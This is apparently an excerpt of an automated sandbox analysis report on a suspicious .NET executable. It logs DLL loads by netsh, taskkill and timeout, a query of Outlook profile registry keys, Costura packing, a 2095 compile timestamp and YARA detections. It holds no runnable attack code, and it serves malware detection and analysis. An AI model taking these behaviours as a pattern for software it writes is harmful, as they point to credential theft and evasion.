Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: uyz4YPUyc9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: uyz4YPUyc9.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: uyz4YPUyc9.exe

Static file information: File size 3748352 > 1048576

Source: uyz4YPUyc9.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x391c00

Source: uyz4YPUyc9.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: uyz4YPUyc9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2314206876.000001D850FE0000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389E0000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.newtonsoft.json.bson.pdb.compressed\|\|\|Newtonsoft.Json.Bson.pdb\|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F\|26968 source: uyz4YPUyc9.exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389E0000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: uyz4YPUyc9.exe, 00000000.00000002.2314206876.000001D850FE0000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb\ source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389E0000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
Source:	Binary string: costura.costura.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: costura.wpf.ui.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo source: uyz4YPUyc9.exe
Source:	Binary string: !costura.polly.core.pdb.compressed source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.newtonsoft.json.bson.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: costura.wpf.ui.pdb.compressed\|\|\|Wpf.Ui.pdb\|299223DFCADFE8FD464F218CE110C10266AB22B0\|139288 source: uyz4YPUyc9.exe
Source:	Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb\ source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389E0000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
Source:	Binary string: costura.polly.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: uyz4YPUyc9.exe
Source:	Binary string: costura.polly.pdb.compressed\|\|\|Polly.pdb\|6E4429D15FBCD96C44E391E109CB500EC2508333\|83400 source: uyz4YPUyc9.exe
Source:	Binary string: costura.polly.core.pdb.compressed\|\|\|Polly.Core.pdb\|C1D3F2BA348EA2F6635B8F5961AD127E831487C6\|66148 source: uyz4YPUyc9.exe
Source:	Binary string: costura.icsharpcode.sharpziplib.pdb.compressed\|\|\|ICSharpCode.SharpZipLib.pdb\|E1FCA83029D1440F54FB3747B240365A6DF0A598\|121652 source: uyz4YPUyc9.exe
Source:	Binary string: costura.polly.core.pdb.compressed source: uyz4YPUyc9.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: uyz4YPUyc9.exe, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 0.2.uyz4YPUyc9.exe.1d851020000.8.raw.unpack, DynamicUtils.cs	.Net Code: CreateSharpArgumentInfoArray
Source: 0.2.uyz4YPUyc9.exe.1d851020000.8.raw.unpack, LateBoundReflectionDelegateFactory.cs	.Net Code: CreateDefaultConstructor
Source: 0.2.uyz4YPUyc9.exe.1d8484a0a68.2.raw.unpack, DynamicUtils.cs	.Net Code: CreateSharpArgumentInfoArray
Source: 0.2.uyz4YPUyc9.exe.1d8484a0a68.2.raw.unpack, LateBoundReflectionDelegateFactory.cs	.Net Code: CreateDefaultConstructor
Source: 0.2.uyz4YPUyc9.exe.1d851140000.9.raw.unpack, ReflectionMemberAccessor.cs	.Net Code: CreateParameterlessConstructor

Yara detected Costura Assembly Loader

Source: Yara match	File source: uyz4YPUyc9.exe, type: SAMPLE
Source: Yara match	File source: 0.0.uyz4YPUyc9.exe.1d836200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uyz4YPUyc9.exe PID: 5276, type: MEMORYSTR

Source: uyz4YPUyc9.exe

Static PE information: 0xEBE8C2F3 [Fri Jun 3 00:40:19 2095 UTC]

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F4AF31 push eax; ret	0_2_00007FF848F4AF54
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F48169 push ebx; ret	0_2_00007FF848F4816A
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F1785E push eax; iretd	0_2_00007FF848F1786D
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F4A701 push eax; ret	0_2_00007FF848F4A724
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F1770D pushad ; iretd	0_2_00007FF848F1785D
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F177F3 pushad ; iretd	0_2_00007FF848F1785D

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
